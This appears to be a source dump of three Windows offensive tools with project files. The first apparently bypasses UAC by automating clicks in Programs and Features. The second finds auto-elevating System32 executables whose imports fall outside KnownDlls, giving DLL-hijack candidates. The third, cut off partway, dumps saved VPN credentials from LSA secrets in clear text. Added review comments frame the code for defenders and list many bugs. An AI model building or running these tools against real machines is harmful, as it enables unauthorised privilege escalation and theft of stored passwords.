// Copies the text of list-view items 0..ItemCount-1 into pItems[i].DisplayName
// and clears pItems[i].Vulnerable.
//
// The control belongs to another process, so the LVITEM structure and the text
// buffer that LVM_GETITEMTEXT works on are allocated inside that process
// (VirtualAllocEx), the structure is written there (WriteProcessMemory) and
// each result is copied back (ReadProcessMemory). hProcess must be a handle to
// the process that owns SysListView32Hwnd.
VOID GetListedNames(HANDLE hProcess, HWND SysListView32Hwnd, pUninstallItem pItems, DWORD ItemCount)
{
    WCHAR TextBuf[MAX_BUF] = { 0 };
    PWCHAR pRemoteText = (PWCHAR)VirtualAllocEx(hProcess, NULL, MAX_BUF, MEM_COMMIT, PAGE_READWRITE);
    LPLVITEMW pRemoteItem = (LPLVITEMW)VirtualAllocEx(hProcess, NULL, sizeof(LVITEM), MEM_COMMIT, PAGE_READWRITE);

    LVITEMW lvitem;
    lvitem.cchTextMax = MAX_BUF;
    lvitem.iSubItem = 0;
    lvitem.pszText = pRemoteText;
    WriteProcessMemory(hProcess, pRemoteItem, &lvitem, sizeof(LVITEMW), NULL);

    for (DWORD i = 0; i < ItemCount; i++)
    {
        SendMessage(SysListView32Hwnd, LVM_GETITEMTEXT, i, (LPARAM)pRemoteItem);
        ReadProcessMemory(hProcess, pRemoteText, TextBuf, MAX_BUF, NULL);
        pItems[i].Vulnerable = FALSE;
        lstrcpyn(pItems[i].DisplayName, TextBuf, MAX_BUF);
    }
}

// Posts a left-button down/up/double-click/up message sequence to the list
// view at a point inside item ItemIndex. The item rectangle is obtained with
// LVM_GETITEMRECT through a RECT allocated in the owning process.
// Returns FALSE when a handle is missing or a cross-process call fails, TRUE
// once the messages are posted (delivery is not confirmed).
BOOL DBClickItem(HANDLE hProcess, HWND SysListView32Hwnd, DWORD ItemIndex)
{
    if (!SysListView32Hwnd || !hProcess)
        return FALSE;

    PRECT pRemoteRect = (PRECT)VirtualAllocEx(hProcess, NULL, sizeof(RECT), MEM_COMMIT, PAGE_READWRITE);
    if (!pRemoteRect)
        return FALSE;

    // LVM_GETITEMRECT reads the requested rectangle kind from the left member.
    RECT Rect;
    Rect.left = LVIR_BOUNDS;
    if (!WriteProcessMemory(hProcess, pRemoteRect, &Rect, sizeof(RECT), NULL))
        return FALSE;
    SendMessage(SysListView32Hwnd, LVM_GETITEMRECT, ItemIndex, (LPARAM)pRemoteRect);
    if (!ReadProcessMemory(hProcess, pRemoteRect, &Rect, sizeof(RECT), NULL))
        return FALSE;

    // Mouse lParam layout: y in the high word, x in the low word. The point is
    // the vertical middle of the row, 30 pixels right of its left edge.
    DWORD Pos = ((Rect.top + Rect.bottom) / 2 << 16) + (Rect.left + 30);
    PostMessage(SysListView32Hwnd, WM_LBUTTONDOWN, MK_LBUTTON, (LPARAM)Pos);
    PostMessage(SysListView32Hwnd, WM_LBUTTONUP, NULL, (LPARAM)Pos);
    PostMessage(SysListView32Hwnd, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)Pos);
    PostMessage(SysListView32Hwnd, WM_LBUTTONUP, NULL, (LPARAM)Pos);
    return TRUE;
}

// Opens the process that owns hWnd with PROCESS_ALL_ACCESS and returns the
// handle (NULL on failure, as returned by OpenProcess). The handle is not
// closed anywhere in this file.
HANDLE WindowToProcess(HWND hWnd)
{
    DWORD dwPID = 0;
    DWORD dwThreadID = GetWindowThreadProcessId(hWnd, &dwPID);
    return OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID);
}

// Command line, as parsed below:
//   -list     print "index:DisplayName:UninstallString" for every listed entry
//             whose name matches a registry Uninstall entry
//   -exp N    post a double-click to list entry N
// argv[1] (and argv[2] for -exp) are read without checking argc.
void wmain(int argc, wchar_t* argv[])
{
    bool bList = false;
    int nIndex = -1;
    vector vAppInfo;
    vector vAppInfo_wow64;
    WCHAR WinClassName[MAX_BUF] = { 0 };
    WCHAR WinText[MAX_BUF] = { 0 };
    HWND Hwnd = NULL;
    // Window classes from the top-level window down to the list view.
    PWCHAR WindowClasses[] = { L"ShellTabWindowClass", L"DUIViewWndClassName", L"DirectUIHWND", L"CtrlNotifySink", L"SHELLDLL_DefView", L"SysListView32" };

    if (wcsicmp(argv[1], L"-list") == 0)
        bList = true;
    else if (wcsicmp(argv[1], L"-exp") == 0)
        nIndex = _wtoi(argv[2]);

    if (!bList && nIndex == 0)
        return;

    // Installed-program data from the native and the 32-bit-on-64-bit registry views.
    GetAllInstalledAppInfoA("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", vAppInfo);
    GetAllInstalledAppInfoA("SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall", vAppInfo_wow64);

    // Opens the Programs and Features view; SW_HIDE is requested for the child.
    WinExec("rundll32.exe shell32.dll Control_RunDLL appwiz.cpl 2", SW_HIDE);

    // Poll the foreground window, at most five times 100 ms apart, until its
    // class is CabinetWClass and its title contains the English string
    // "Programs and Features".
    for (int i = 0; i < 5; i++)
    {
        Hwnd = GetForegroundWindow();
        if (lstrcmp(WinClassName, L"CabinetWClass") != 0 || StrStrW(WinText, L"Programs and Features") == NULL)
        {
            Hwnd = GetForegroundWindow();
            GetClassName(Hwnd, WinClassName, MAX_BUF);
            SendMessage(Hwnd, WM_GETTEXT, MAX_BUF, (LPARAM)WinText);
        }
        else
            break;
        Sleep(100);
    }

    ShowWindow(Hwnd, SW_MINIMIZE);

    HWND SysListView32 = FindNestedWindowFromClassName(Hwnd, WindowClasses, sizeof(WindowClasses) / sizeof(PWCHAR));
    if (!SysListView32)
    {
        _tprintf(L"Not found window.\n");
        goto CLEAN;
    }

    DWORD ItemCount = ListView_GetItemCount(SysListView32);
    if(ItemCount <= 0)
    {
        _tprintf(L"Item count %d.\n", ItemCount);
        goto CLEAN;
    }

    pUninstallItem pItems = (pUninstallItem)new UninstallItem[ItemCount];
    memset(pItems, 0, sizeof(UninstallItem)*ItemCount);

    HANDLE hProcess = WindowToProcess(SysListView32);
    if (!hProcess)
    {
        _tprintf(L"Window to process error.\n");
        goto CLEAN;
    }

    GetListedNames(hProcess, SysListView32, pItems, ItemCount);

    if (bList)
    {
        // Match every listed name, case-insensitively, against DisplayName in
        // the native view first and in the Wow6432Node view second.
        for (int i = 0; i < ItemCount; i++)
        {
            bool bFind = false;
            char* name = Unicode2Ansi(pItems[i].DisplayName);
            vector::iterator iter = vAppInfo.begin();
            while (iter != vAppInfo.end())
            {
                if (stricmp(name, iter->strDisplayName.c_str()) == 0)
                {
                    _tprintf(L"%d:%S:%S\n", i, iter->strDisplayName.c_str(), iter->strUninstallString.c_str());
                    bFind = true;
                    break;
                }
                ++iter;
            }
            if (!bFind)
            {
                iter = vAppInfo_wow64.begin();
                while (iter != vAppInfo_wow64.end())
                {
                    if (stricmp(name, iter->strDisplayName.c_str()) == 0)
                    {
                        _tprintf(L"%d:%S:%S\n", i, iter->strDisplayName.c_str(), iter->strUninstallString.c_str());
                        break;
                    }
                    ++iter;
                }
            }
        }
    }
    else if (nIndex >= 0)
    {
        DBClickItem(hProcess, SysListView32, nIndex);
        Sleep(100);
    }

CLEAN:
    // Ask the window found above to close.
    SendMessage(Hwnd, WM_CLOSE, 0, 0);
}
-------------------------------------------------------------------------------- /uacbypass/uacbypass.vcxproj: 
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3} 23 | Win32Proj 24 | uac_bypass_uninstall 25 | 8.1 26 | uacbypass 27 | 28 | 29 | 30 | Application 31 | true 32 | v140 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v140 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v140 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v140 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | 106 | 107 | Console 108 | true 109 | 110 | 111 | 112 | 113 | Level3 114 | 115 | 116 | MaxSpeed 117 | true 118 | true 119 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | 121 | 122 | Console 123 | true 124 | true 125 | true 126 | 127 | 128 | 129 | 130 | Level3 131 | 132 | 133 | MaxSpeed 134 | true 135 | true 136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 137 | 138 | 139 | Console 140 | true 141 | true 142 | true 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | -------------------------------------------------------------------------------- /uacbypass/uacbypass.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | 
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 |
--------------------------------------------------------------------------------
/uachijack/uachijack.cpp:
--------------------------------------------------------------------------------
// uachijack: walks .exe files, reads their RT_MANIFEST resources, and for every
// manifest that contains both "requireAdministrator" and "true" prints the file
// path followed by each imported DLL name that has no section object under
// \KnownDlls. With -f it instead writes the manifest resources of one file to disk.
//
// Reading the output as a defender: a printed DLL name is one the scan could not
// find under \KnownDlls, so it is presumably resolved through the regular DLL
// search order when the executable starts. Treat the list as audit input (for
// example, to confirm that the directories involved are writable by
// administrators only), not as proof of a weakness.
//
// NOTE(review): the header names of the four #include lines below were lost when
// the page was extracted; they are reproduced as they appear.
#include
#include
#include
#include
#pragma comment(lib, "Shlwapi.lib")


// Local copies of NT definitions, so the file builds without the DDK headers.
// STATUS_INFO_LENGTH_MISMATCH, STATUS_ACCESS_DENIED, OBJ_KERNEL_HANDLE and
// IO_STATUS_BLOCK are declared here but not referenced anywhere in this file.
#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_KERNEL_HANDLE 0x00000200L

typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK
{
    NTSTATUS Status;
    ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

// Counted UTF-16 string as consumed by the native API; filled in by
// RtlInitUnicodeString below.
typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
}UNICODE_STRING, *PUNICODE_STRING;

// Names the object to open (here: a section under \KnownDlls).
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

// Function-pointer types for the two ntdll exports resolved in InitNtFunc().
typedef NTSTATUS(CALLBACK* ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );

typedef VOID(CALLBACK* RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );

// Set by InitNtFunc(); both are called without a NULL check later on.
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;


// Converts a NUL-terminated string in the ANSI code page to a newly allocated
// wide string. The caller owns the returned buffer and must free() it.
// NOTE(review): the malloc() result is not checked before memset(), and the only
// caller in this file (ParseImportTable) never frees the returned buffer.
PWCHAR Ansi2Uni(LPCSTR lpMultiByteStr)
{
    int nUniLen = 0;
    PWCHAR pUnicode = NULL;
    // First call only measures: with cchWideChar 0 it returns the required length
    // in characters, terminator included because the input length is -1.
    nUniLen = MultiByteToWideChar(CP_ACP, 0, lpMultiByteStr, -1, NULL, 0);
    pUnicode = (PWCHAR)malloc((nUniLen + 1) * sizeof(WCHAR));
    memset(pUnicode, 0, (nUniLen + 1) * sizeof(WCHAR));
    MultiByteToWideChar(CP_ACP, 0, lpMultiByteStr, -1, (LPWSTR)pUnicode, nUniLen);
    return pUnicode;
}

// Resolves RtlInitUnicodeString and ZwOpenSection from the already loaded
// ntdll.dll and stores them in the globals above.
// NOTE(review): neither GetModuleHandle() nor GetProcAddress() is checked; a
// failed lookup leaves a NULL pointer that CheckKnownDllsExists() then calls.
void InitNtFunc()
{
    HMODULE hModule = GetModuleHandle(_T("ntdll.dll"));
    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(hModule, "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress(hModule, "ZwOpenSection");
}

// Returns TRUE when a section object named \KnownDlls\ followed by dllName can be
// opened with SECTION_QUERY access, FALSE for any failing NTSTATUS.
// Every failure, not only "name not found", is therefore reported as
// "not a known DLL".
// NOTE(review): wsprintfW() is not told the size of known_path (MAX_PATH
// characters), and dllName comes from the import table of the file being
// scanned, so an over-long name overruns the stack buffer.
// NOTE(review): only \KnownDlls is consulted; 32-bit images may need to be
// checked against \KnownDlls32 instead — confirm.
BOOL CheckKnownDllsExists(LPCWSTR dllName)
{
    HANDLE hSection = NULL;
    NTSTATUS status;
    OBJECT_ATTRIBUTES attributes;
    UNICODE_STRING us;
    WCHAR known_path[MAX_PATH] = { 0 };

    wsprintfW(known_path, L"\\KnownDlls\\%s", dllName);

    RtlInitUnicodeString(&us, known_path);

    attributes.Length = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory = NULL;
    attributes.ObjectName = &us;
    attributes.Attributes = OBJ_CASE_INSENSITIVE;
    attributes.SecurityDescriptor = NULL;
    attributes.SecurityQualityOfService = NULL;

    status = ZwOpenSection(&hSection, SECTION_QUERY, &attributes);

    // The handle is only needed for the existence test.
    if (hSection)
        CloseHandle(hSection);

    return NT_SUCCESS(status);
}

// Translates a relative virtual address into an offset in the raw file, using
// the section that contains the RVA. An RVA of 0 is returned unchanged.
// NOTE(review): when no section contains rva the loop ends with pSeh one entry
// past the last section header, and the return statement reads from it; the
// result is then an arbitrary offset into (or beyond) the file buffer.
DWORD Rva2Offset(DWORD rva, PIMAGE_SECTION_HEADER psh, PIMAGE_NT_HEADERS pnt)
{
    size_t i = 0;
    PIMAGE_SECTION_HEADER pSeh;
    if (rva == 0)
        return (rva);
    pSeh = psh;
    for (i = 0; i < pnt->FileHeader.NumberOfSections; i++)
    {
        if (rva >= pSeh->VirtualAddress && rva < pSeh->VirtualAddress + pSeh->Misc.VirtualSize)
            break;
        pSeh++;
    }
    return (rva - pSeh->VirtualAddress + pSeh->PointerToRawData);
}

// Reads the whole file into memory, walks its import descriptor array and prints
// the name of every imported DLL for which CheckKnownDllsExists() returns FALSE.
// NOTE(review): this parses file contents without validation:
//   - CreateFile, GetFileSize, VirtualAlloc and ReadFile results are not checked
//     (share mode 0 asks for exclusive access, so the open can fail for files
//     that are already open elsewhere);
//   - e_lfanew, the data-directory RVA and each Name RVA are used as offsets
//     without checking the MZ/PE signatures or that they stay inside the buffer;
//   - PIMAGE_NT_HEADERS has the layout of the build's own bitness, so an image of
//     the other bitness is presumably read with the wrong optional-header layout;
//   - the string returned by Ansi2Uni() is never freed;
//   - VirtualFree() with MEM_DECOMMIT leaves the address range reserved; releasing
//     it takes MEM_RELEASE with a size of 0.
void ParseImportTable(LPCTSTR file)
{
    HANDLE handle = CreateFile(file, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
    DWORD byteread, size = GetFileSize(handle, NULL);
    PVOID virtualpointer = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);
    ReadFile(handle, virtualpointer, size, &byteread, NULL);
    CloseHandle(handle);

    PIMAGE_NT_HEADERS ntheaders = (PIMAGE_NT_HEADERS)(PCHAR(virtualpointer) + PIMAGE_DOS_HEADER(virtualpointer)->e_lfanew);
    PIMAGE_SECTION_HEADER pSech = IMAGE_FIRST_SECTION(ntheaders);
    PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor;

    if (ntheaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size != 0)
    {
        // The buffer holds the raw file, not a mapped image, so every RVA has to
        // go through Rva2Offset() before it is dereferenced.
        pImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD_PTR)virtualpointer + Rva2Offset(ntheaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress, pSech, ntheaders));

        // The descriptor array ends with an entry whose Name field is zero.
        while (pImportDescriptor->Name != NULL)
        {
            char* name = (PCHAR)((DWORD_PTR)virtualpointer + Rva2Offset(pImportDescriptor->Name, pSech, ntheaders));

            if (!CheckKnownDllsExists(Ansi2Uni(name)))
                printf("%s\n", name);

            pImportDescriptor++;
        }
    }

    if (virtualpointer)
        VirtualFree(virtualpointer, size, MEM_DECOMMIT);
}

// EnumResourceNames callback used by the directory scan. lParam carries the path
// of the file being examined. For a manifest that contains both
// "requireAdministrator" and "true" it prints that path and lists the imports
// not covered by \KnownDlls. Always returns TRUE so enumeration continues.
// NOTE(review): FindResource/LoadResource/LockResource results are not checked
// before memcpy(), and the manifest copy is never released with delete[].
// NOTE(review): the "true" test matches that substring anywhere in the manifest;
// presumably it is meant to detect an autoElevate setting — confirm, because as
// written it over-reports.
BOOL CALLBACK EnumResourceNameCallback_Dir(HMODULE hModule, LPCTSTR lpType, LPTSTR lpName, LONG_PTR lParam)
{
    HRSRC hResInfo = FindResource(hModule, lpName, lpType);
    DWORD cbResource = SizeofResource(hModule, hResInfo);

    HGLOBAL hResData = LoadResource(hModule, hResInfo);
    const BYTE *pResource = (const BYTE *)LockResource(hResData);

    // Resource data is not NUL-terminated; copy it so strstr() can be used.
    char* manifest = new char[cbResource + 1];
    memcpy(manifest, pResource, cbResource);
    manifest[cbResource] = '\0';

    if (strstr(manifest, "requireAdministrator"))
    {
        if (strstr(manifest, "true"))
        {
            _tprintf(_T("%s\n"), (TCHAR*)lParam);
            ParseImportTable((TCHAR*)lParam);
        }
    }

    UnlockResource(hResData);
    FreeResource(hResData);

    return TRUE;
}

// Recursively walks lpszDir and runs the manifest check on every file whose
// extension is ".exe" (case-insensitive).
// NOTE(review): the three _stprintf() calls write into MAX_PATH-sized buffers
// without a length limit, so a long path overruns them; the HMODULE returned by
// LoadLibraryEx() is passed on without a NULL check.
void EnumDirectory(LPCTSTR lpszDir)
{
    HANDLE hFind = NULL;
    WIN32_FIND_DATA wfd = { 0 };
    TCHAR szTemp[MAX_PATH] = { 0 };

    _stprintf(szTemp, _T("%s\\*"), lpszDir);

    hFind = FindFirstFile(szTemp, &wfd);
    if (hFind == INVALID_HANDLE_VALUE)
        return;

    do
    {
        // Skip the self and parent entries to avoid endless recursion.
        if (_tcsicmp(wfd.cFileName, _T(".")) == 0 || _tcsicmp(wfd.cFileName, _T("..")) == 0)
            continue;

        if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
        {
            TCHAR szSubDir[MAX_PATH] = { 0 };
            _stprintf(szSubDir, _T("%s\\%s"), lpszDir, wfd.cFileName);
            EnumDirectory(szSubDir);
        }
        else
        {
            TCHAR szFile[MAX_PATH] = { 0 };
            _stprintf(szFile, _T("%s\\%s"), lpszDir, wfd.cFileName);
            TCHAR* ext = PathFindExtension(szFile);
            if (_tcsicmp(ext, _T(".exe")) == 0)
            {
                // LOAD_LIBRARY_AS_DATAFILE maps the file for resource access
                // only; none of its code is executed.
                HMODULE hModule = LoadLibraryEx(szFile, NULL, LOAD_LIBRARY_AS_DATAFILE);
                EnumResourceNames(hModule, RT_MANIFEST, EnumResourceNameCallback_Dir, (LONG_PTR)szFile);
                FreeLibrary(hModule);
            }
        }
    } while (FindNextFile(hFind, &wfd));

    FindClose(hFind);
}

// EnumResourceNames callback used by the single-file mode. lParam carries the
// file-name part of the path; each manifest resource is written unchanged to a
// file named after it plus the resource id or name and a ".manifest" suffix,
// relative to the current directory.
// NOTE(review): lParam is cast to char* although the format string is a TCHAR
// one (the pointer originates from PathFindFileName on a TCHAR path); lpName, a
// pointer, is passed for %d; the _tfopen() result is used without a NULL check.
BOOL CALLBACK EnumResourceNameCallback_file(HMODULE hModule, LPCTSTR lpType, LPTSTR lpName, LONG_PTR lParam)
{
    HRSRC hResInfo = FindResource(hModule, lpName, lpType);
    DWORD cbResource = SizeofResource(hModule, hResInfo);

    HGLOBAL hResData = LoadResource(hModule, hResInfo);
    const BYTE *pResource = (const BYTE *)LockResource(hResData);

    TCHAR filename[MAX_PATH];
    // Integer resource ids and string resource names get different file names.
    if (IS_INTRESOURCE(lpName))
        _stprintf_s(filename, _T("%s_#%d.manifest"), (char*)lParam, lpName);
    else
        _stprintf_s(filename, _T("%s_%s.manifest"), (char*)lParam, lpName);

    FILE *f = _tfopen(filename, _T("wb"));
    fwrite(pResource, cbResource, 1, f);
    fclose(f);

    UnlockResource(hResData);
    FreeResource(hResData);

    return TRUE;
}

// Dumps every RT_MANIFEST resource of one file via EnumResourceNameCallback_file.
// NOTE(review): a failed LoadLibraryEx() (NULL module) is not detected.
void EnumFile(LPCTSTR file)
{
    TCHAR* fileName = PathFindFileName(file);
    HMODULE hModule = LoadLibraryEx(file, NULL, LOAD_LIBRARY_AS_DATAFILE);
    EnumResourceNames(hModule, RT_MANIFEST, EnumResourceNameCallback_file, (LONG_PTR)fileName);
    FreeLibrary(hModule);
}

// Entry point: "-f FILE" dumps the manifests of FILE, "-d" scans
// C:\Windows\System32 (the directory is fixed; no path argument is read).
// NOTE(review): argv[1] and argv[2] are read without checking argc, so running
// the program with too few arguments dereferences a NULL or missing pointer.
void _tmain(int argc, TCHAR* argv[])
{
    InitNtFunc();
    if (_tcsicmp(argv[1], _T("-f")) == 0)
        EnumFile(argv[2]);
    else if (_tcsicmp(argv[1], _T("-d")) == 0)
        EnumDirectory(_T("C:\\Windows\\System32"));
}
-------------------------------------------------------------------------------- /uachijack/uachijack.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {F5593633-8560-4316-BBF2-8CC8D6080843} 23 | Win32Proj 24 | uac_hijack_find 25 | 8.1 26 | uachijack 27 | 28 | 29 | 30 | Application 31 | true 32 | v140 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v140 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v140 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v140 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | 106 | 107 | Console 108 | true 109 | 110 | 111 | 112 | 113 | Level3 114 | 115 | 116 | MaxSpeed 117 | true 118 | true 119 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | 121 | 122 | Console 123 | true 124 | true 125 | true 126 | 127 | 128 | 129 | 130 | Level3 131 | 132 | 133 | MaxSpeed 134 | true 135 | true 136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 137 | 138 | 139 | Console 140 | true 141 | 
true 142 | true 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | -------------------------------------------------------------------------------- /uachijack/uachijack.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 |
--------------------------------------------------------------------------------
/vpnpass/vpnpass.cpp:
--------------------------------------------------------------------------------
// vpnpass: lists the RAS phonebook entries (dial-up / VPN connections) of one
// user and of the machine-wide phonebook, pairs them with credentials read from
// two LSA private-data keys, and prints one tab-separated row per entry,
// password included.
//
// Reading this as a defender: the credentials come from LsaRetrievePrivateData()
// on a policy handle opened with POLICY_GET_PRIVATE_INFORMATION, which is
// presumably only granted to highly privileged callers — confirm for the target
// OS. Credentials saved with a connection are therefore readable in clear text
// by any code that runs with that access, and the output of this program is
// itself sensitive because passwords go to stdout unmasked.
//
// NOTE(review): the header names of the eight #include lines below were lost
// when the page was extracted; they are reproduced as they appear.
// NOTE(review): the code passes CHAR buffers to TCHAR-mapped APIs
// (LookupAccountName, LoadLibrary, GetPrivateProfileString, ...), so it
// presumably only builds with the multi-byte character set; the project file on
// this page lists MultiByte for one configuration and Unicode for the others.
#include
#include
#include
#include
#include
#include
#include
#include
#pragma comment(lib, "Rasapi32.lib")
#pragma comment(lib, "Wtsapi32.lib")

// One output row: the phonebook entry plus the credentials matched to it.
typedef struct _tagRASDIALPINFO
{
    CHAR szEntryName[RAS_MaxEntryName + 1];
    CHAR szDeviceType[RAS_MaxDeviceType + 1];
    CHAR szDeviceName[RAS_MaxDeviceName + 1];
    CHAR szPhoneNumber[RAS_MaxPhoneNumber + 1];
    CHAR szUserName[UNLEN + 1];
    CHAR szPassword[PWLEN + 1];
}RASDIALPINFO, *PRASDIALPINFO;

// Counted list of rows; rdi is declared with one element and the allocation in
// get_item_info() is sized for ulCount of them.
typedef struct _tagRASDIALPINFOLIST
{
    ULONG ulCount;
    RASDIALPINFO rdi[1];
}RASDIALPINFOLIST, *PRASDIALPINFOLIST;

// One credential record as extracted by parse_lsa_data(); uid is compared with
// the DialParamsUID value of a phonebook entry.
typedef struct _tagPASSWORDS
{
    CHAR uid[256];
    CHAR pass[256];
    CHAR login[256];
}PASSWORDS, *PPASSWORDS;

// Account name taken from argv[1] in main(); read by get_local_sid() and by the
// phonebook path construction.
const char* user = NULL;

// Fills an LSA_UNICODE_STRING with the wide form of AValue. Length and
// MaximumLength are byte counts that exclude the terminator, and the buffer is
// not NUL-terminated. The caller releases lsa->Buffer with free().
// NOTE(review): the malloc() result is not checked; NULL is passed where the
// API expects integer arguments (flags and output size of 0).
void StrToLsaStr(LPSTR AValue, PLSA_UNICODE_STRING lsa)
{
    DWORD dwSize = 0;
    // Measuring call: returns the character count including the terminator.
    dwSize = MultiByteToWideChar(CP_ACP, NULL, AValue, -1, NULL, NULL);
    lsa->Length = (dwSize - 1) * 2;
    lsa->MaximumLength = lsa->Length;
    lsa->Buffer = (LPWSTR)malloc(lsa->MaximumLength);
    MultiByteToWideChar(CP_ACP, NULL, AValue, strlen(AValue), lsa->Buffer, dwSize - 1);
}

// Looks up the SID of the account named by the global `user` on the local
// machine and returns its string form, or NULL on any failure.
// ConvertSidToStringSidA is resolved at runtime from advapi32.dll.
// NOTE(review): the returned string is allocated by ConvertSidToStringSidA and
// has to be released with LocalFree(); the caller in this file does not do so.
// The return value of proc() is ignored, so a failed conversion returns the
// initial NULL. The final `return NULL` is unreachable.
LPSTR get_local_sid()
{
    // The union reserves 256 bytes so LookupAccountName() has room for a SID
    // with sub-authorities.
    union
    {
        SID s;
        char c[256];
    }Sid;

    typedef BOOL(WINAPI *ConvertSid2StringSid)(PSID, LPTSTR*);

    DWORD dwSidSize = 0;
    DWORD dwDomainNameSize = 0;
    CHAR szDomainName[256] = { 0 };

    LPSTR pSid = NULL;
    SID_NAME_USE peUse;

    HINSTANCE hLibrary = NULL;

    dwSidSize = sizeof(Sid);
    dwDomainNameSize = sizeof(szDomainName);

    if (!LookupAccountName(NULL, user, &Sid, &dwSidSize, szDomainName, &dwDomainNameSize, &peUse))
        return NULL;

    if (!IsValidSid(&Sid))
        return NULL;

    hLibrary = LoadLibrary("advapi32.dll");
    if (hLibrary == NULL)
        return NULL;

    ConvertSid2StringSid proc = (ConvertSid2StringSid)GetProcAddress(hLibrary, "ConvertSidToStringSidA");
    if (proc != NULL)
    {
        //Convert
